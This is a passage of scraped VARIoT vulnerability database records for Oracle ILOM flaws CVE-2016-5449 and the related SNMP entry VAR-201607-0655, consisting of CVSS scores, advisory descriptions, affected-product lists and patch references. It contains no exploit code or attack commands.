"https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "PARTIAL", baseScore: 5, confidentialityImpact: "NONE", exploitabilityScore: 10, id: "CVE-2016-5449", impactScore: 2.9, integrityImpact: "NONE", severity: "MEDIUM", trust: 1.9, vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:P", version: "2.0", }, { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "VULHUB", availabilityImpact: "PARTIAL", baseScore: 5, confidentialityImpact: "NONE", exploitabilityScore: 10, id: "VHN-94268", impactScore: 2.9, integrityImpact: "NONE", severity: "MEDIUM", trust: 0.1, vectorString: "AV:N/AC:L/AU:N/C:N/I:N/A:P", version: "2.0", }, ], cvssV3: [ { attackComplexity: "LOW", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", exploitabilityScore: 3.9, id: "CVE-2016-5449", impactScore: 3.6, integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", trust: 1.8, userInteraction: "NONE", vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.0", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2016-5449", trust: 1, value: "HIGH", }, { author: "NVD", id: "CVE-2016-5449", trust: 0.8, value: "High", }, { author: "CNNVD", id: "CNNVD-201607-813", trust: 0.6, value: "MEDIUM", }, { author: "VULHUB", id: "VHN-94268", trust: 0.1, value: "MEDIUM", }, { author: "VULMON", id: "CVE-2016-5449", trust: 0.1, value: "MEDIUM", }, ], }, ], sources: [ { db: 
"VULHUB", id: "VHN-94268", }, { db: "VULMON", id: "CVE-2016-5449", }, { db: "JVNDB", id: "JVNDB-2016-003877", }, { db: "CNNVD", id: "CNNVD-201607-813", }, { db: "NVD", id: "CVE-2016-5449", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect availability via vectors related to Console Redirection. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software:\nOracle Application Express\nOracle Database Server\nOracle Access Manager\nOracle BI Publisher\nOracle Business Intelligence Enterprise Edition\nOracle Directory Server Enterprise Edition\nOracle Exalogic Infrastructure\nOracle Fusion Middleware\nOracle GlassFish Server\nOracle HTTP Server\nOracle JDeveloper\nOracle Portal\nOracle WebCenter Sites\nOracle WebLogic Server\nOutside In Technology\nHyperion Financial Reporting\nEnterprise Manager Base Platform\nEnterprise Manager for Fusion Middleware\nEnterprise Manager Ops Center\nOracle E-Business Suite\nOracle Agile Engineering Data Management\nOracle Agile PLM\nOracle Demand Planning\nOracle Engineering Data Management\nOracle Transportation Management\nPeopleSoft Enterprise FSCM\nPeopleSoft Enterprise PeopleTools\nJD Edwards EnterpriseOne Tools\nSiebel Applications\nOracle Fusion Applications\nOracle Communications ASAP\nOracle Communications Core Session Manager\nOracle Communications EAGLE Application Processor\nOracle Communications Messaging Server\nOracle Communications Network Charging and Control\nOracle Communications Operations Monitor\nOracle Communications Policy Management\nOracle Communications Session Border 
Controller\nOracle Communications Unified Session Manager\nOracle Enterprise Communications Broker\nOracle Banking Platform\nOracle Financial Services Lending and Leasing\nOracle FLEXCUBE Direct Banking\nOracle Health Sciences Clinical Development Center\nOracle Health Sciences Information Manager\nOracle Healthcare Analytics Data Integration\nOracle Healthcare Master Person Index\nOracle Documaker\nOracle Insurance Calculation Engine\nOracle Insurance Policy Administration J2EE\nOracle Insurance Rules Palette\nMICROS Retail XBRi Loss Prevention\nOracle Retail Central\nOracle Back Office\nOracle Returns Management\nOracle Retail Integration Bus\nOracle Retail Order Broker\nOracle Retail Service Backbone\nOracle Retail Store Inventory Management\nOracle Utilities Framework\nOracle Utilities Network Management System\nOracle Utilities Work and Asset Management\nOracle In-Memory Policy Analytics\nOracle Policy Automation\nOracle Policy Automation Connector for Siebel\nOracle Policy Automation for Mobile Devices\nPrimavera Contract Management\nPrimavera P6 Enterprise Project Portfolio Management\nOracle Java SE\nOracle Java SE Embedded\nOracle JRockit\n40G 10G 72/64 Ethernet Switch\nFujitsu M10-1 Servers\nFujitsu M10-4 Servers\nFujitsu M10-4S Servers\nILOM\nOracle Switch ES1-24\nSolaris\nSolaris Cluster\nSPARC Enterprise M3000 Servers\nSPARC Enterprise M4000 Servers\nSPARC Enterprise M5000 Servers\nSPARC Enterprise M8000 Servers\nSPARC Enterprise M9000 Servers\nSun Blade 6000 Ethernet Switched NEM 24P 10GE\nSun Data Center InfiniBand Switch 36\nSun Network 10GE Switch 72p\nSun Network QDR InfiniBand Gateway Switch\nOracle Secure Global Desktop\nOracle VM VirtualBox\nMySQL Server\nExploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. \nThe vulnerability can be exploited over the 'HTTP' protocol. 
The 'Console Redirection' sub component is affected. \nThis vulnerability affects the following supported versions:\n3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation. A remote attacker can exploit this vulnerability to cause a denial of service and affect data availability", sources: [ { db: "NVD", id: "CVE-2016-5449", }, { db: "JVNDB", id: "JVNDB-2016-003877", }, { db: "BID", id: "91787", }, { db: "BID", id: "91986", }, { db: "VULHUB", id: "VHN-94268", }, { db: "VULMON", id: "CVE-2016-5449", }, ], trust: 2.34, }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2016-5449", trust: 2.9, }, { db: "BID", id: "91787", trust: 1.5, }, { db: "BID", id: "91986", trust: 1.5, }, { db: "SECTRACK", id: "1036408", trust: 1.2, }, { db: "JVNDB", id: "JVNDB-2016-003877", trust: 0.8, }, { db: "CNNVD", id: "CNNVD-201607-813", trust: 0.7, }, { db: "VULHUB", id: "VHN-94268", trust: 0.1, }, { db: "VULMON", id: "CVE-2016-5449", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-94268", }, { db: "VULMON", id: "CVE-2016-5449", }, { db: "BID", id: "91787", }, { db: "BID", id: "91986", }, { db: "JVNDB", id: "JVNDB-2016-003877", }, { db: "CNNVD", id: "CNNVD-201607-813", }, { db: "NVD", id: "CVE-2016-5449", }, ], }, id: "VAR-201607-0656", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-94268", }, ], trust: 0.01, }, last_update_date: "2024-11-23T20:10:08.084000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": 
"https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "Oracle Critical Patch Update Advisory - July 2016", trust: 0.8, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { title: "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", trust: 0.8, url: "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html", }, { title: "July 2016 Critical Patch Update Released", trust: 0.8, url: "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update", }, { title: "Oracle Sun Systems Products Suite ILOM Fixes for component security vulnerabilities", trust: 0.6, url: "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=63173", }, { title: "Oracle: Oracle Critical Patch Update Advisory - July 2016", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=3a04485ebb79f7fbc2472bf9af5ce489", }, ], sources: [ { db: "VULMON", id: "CVE-2016-5449", }, { db: "JVNDB", id: "JVNDB-2016-003877", }, { db: "CNNVD", id: "CNNVD-201607-813", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "NVD-CWE-noinfo", trust: 1, }, ], sources: [ { db: "NVD", id: "CVE-2016-5449", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.5, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { trust: 1.3, url: "http://www.securityfocus.com/bid/91986", }, { trust: 1.2, url: "http://www.securityfocus.com/bid/91787", }, { trust: 1.2, url: "http://www.securitytracker.com/id/1036408", }, { trust: 0.8, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-5449", }, { trust: 0.8, 
url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-5449", }, { trust: 0.3, url: "http://www.oracle.com", }, { trust: 0.3, url: "http://support.citrix.com/article/ctx216642", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21984819", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21988710", }, { trust: 0.3, url: "http://www.oracle.com/index.html", }, { trust: 0.1, url: "https://cwe.mitre.org/data/definitions/.html", }, { trust: 0.1, url: "https://nvd.nist.gov", }, { trust: 0.1, url: "http://tools.cisco.com/security/center/viewalert.x?alertid=47152", }, ], sources: [ { db: "VULHUB", id: "VHN-94268", }, { db: "VULMON", id: "CVE-2016-5449", }, { db: "BID", id: "91787", }, { db: "BID", id: "91986", }, { db: "JVNDB", id: "JVNDB-2016-003877", }, { db: "CNNVD", id: "CNNVD-201607-813", }, { db: "NVD", id: "CVE-2016-5449", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-94268", }, { db: "VULMON", id: "CVE-2016-5449", }, { db: "BID", id: "91787", }, { db: "BID", id: "91986", }, { db: "JVNDB", id: "JVNDB-2016-003877", }, { db: "CNNVD", id: "CNNVD-201607-813", }, { db: "NVD", id: "CVE-2016-5449", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2016-07-21T00:00:00", db: "VULHUB", id: "VHN-94268", }, { date: "2016-07-21T00:00:00", db: "VULMON", id: "CVE-2016-5449", }, { date: "2016-07-15T00:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "91986", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003877", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-813", }, { date: "2016-07-21T10:15:04.880000", db: "NVD", id: "CVE-2016-5449", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", 
data: { "@container": "@list", }, }, data: [ { date: "2017-09-01T00:00:00", db: "VULHUB", id: "VHN-94268", }, { date: "2017-09-01T00:00:00", db: "VULMON", id: "CVE-2016-5449", }, { date: "2018-10-15T09:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "91986", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003877", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-813", }, { date: "2024-11-21T02:54:20.300000", db: "NVD", id: "CVE-2016-5449", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "network", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91986", }, ], trust: 0.6, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle Sun Systems Products Suite of ILOM In Console Redirection Vulnerabilities", sources: [ { db: "JVNDB", id: "JVNDB-2016-003877", }, ], trust: 0.8, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unknown", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91986", }, ], trust: 0.6, }, }
var-201607-0655
Vulnerability from variot
Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect integrity and availability via vectors related to SNMP. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software: Oracle Application Express Oracle Database Server Oracle Access Manager Oracle BI Publisher Oracle Business Intelligence Enterprise Edition Oracle Directory Server Enterprise Edition Oracle Exalogic Infrastructure Oracle Fusion Middleware Oracle GlassFish Server Oracle HTTP Server Oracle JDeveloper Oracle Portal Oracle WebCenter Sites Oracle WebLogic Server Outside In Technology Hyperion Financial Reporting Enterprise Manager Base Platform Enterprise Manager for Fusion Middleware Enterprise Manager Ops Center Oracle E-Business Suite Oracle Agile Engineering Data Management Oracle Agile PLM Oracle Demand Planning Oracle Engineering Data Management Oracle Transportation Management PeopleSoft Enterprise FSCM PeopleSoft Enterprise PeopleTools JD Edwards EnterpriseOne Tools Siebel Applications Oracle Fusion Applications Oracle Communications ASAP Oracle Communications Core Session Manager Oracle Communications EAGLE Application Processor Oracle Communications Messaging Server Oracle Communications Network Charging and Control Oracle Communications Operations Monitor Oracle Communications Policy Management Oracle Communications Session Border Controller Oracle Communications Unified Session Manager Oracle Enterprise Communications Broker Oracle Banking Platform Oracle Financial Services Lending and Leasing Oracle FLEXCUBE Direct Banking Oracle Health Sciences Clinical Development Center Oracle Health Sciences Information Manager Oracle Healthcare Analytics Data Integration Oracle Healthcare Master Person Index Oracle Documaker Oracle Insurance Calculation Engine Oracle Insurance 
Policy Administration J2EE Oracle Insurance Rules Palette MICROS Retail XBRi Loss Prevention Oracle Retail Central Oracle Back Office Oracle Returns Management Oracle Retail Integration Bus Oracle Retail Order Broker Oracle Retail Service Backbone Oracle Retail Store Inventory Management Oracle Utilities Framework Oracle Utilities Network Management System Oracle Utilities Work and Asset Management Oracle In-Memory Policy Analytics Oracle Policy Automation Oracle Policy Automation Connector for Siebel Oracle Policy Automation for Mobile Devices Primavera Contract Management Primavera P6 Enterprise Project Portfolio Management Oracle Java SE Oracle Java SE Embedded Oracle JRockit 40G 10G 72/64 Ethernet Switch Fujitsu M10-1 Servers Fujitsu M10-4 Servers Fujitsu M10-4S Servers ILOM Oracle Switch ES1-24 Solaris Solaris Cluster SPARC Enterprise M3000 Servers SPARC Enterprise M4000 Servers SPARC Enterprise M5000 Servers SPARC Enterprise M8000 Servers SPARC Enterprise M9000 Servers Sun Blade 6000 Ethernet Switched NEM 24P 10GE Sun Data Center InfiniBand Switch 36 Sun Network 10GE Switch 72p Sun Network QDR InfiniBand Gateway Switch Oracle Secure Global Desktop Oracle VM VirtualBox MySQL Server Exploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. The vulnerability can be exploited over the 'SNMP' protocol. The 'SNMP' sub component is affected. This vulnerability affects the following supported versions: 3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation. A remote attacker could exploit this vulnerability to update, insert, or delete data, possibly causing a denial of service; the impact is to data integrity and availability.
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-201607-0655", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.2", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.1", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", 
version: "3.0", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.60", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.16", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.14", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.13", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.12", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.11", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.10", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.9", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.8", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: 
"oracle", version: "5.0.18", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "utilities work and asset management", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.9.1.2.8", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.3.5", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.2.12", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.1.16", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.5.4", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.4.41", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.10.0.6.27", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.3.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.0.0.0", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4", }, { model: "transportation management", scope: "eq", 
trust: 0.3, vendor: "oracle", version: "6.3.5", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.3", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.2", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.7", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.6", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "switch es1-24", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.3", }, { model: "sun network qdr infiniband gateway switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "sun network 10ge switch 72p", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2", }, { model: "sun data center infiniband switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "362.2.2", }, { model: "sun blade ethernet switched nem 24p 10ge", scope: "eq", trust: 0.3, vendor: "oracle", version: "60001.2", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", 
version: "1118", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "10", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.2.2", }, { model: "siebel applications ip2016", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2015", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2014", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.1.1", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.71", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.63", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail 
store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail 
integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: 
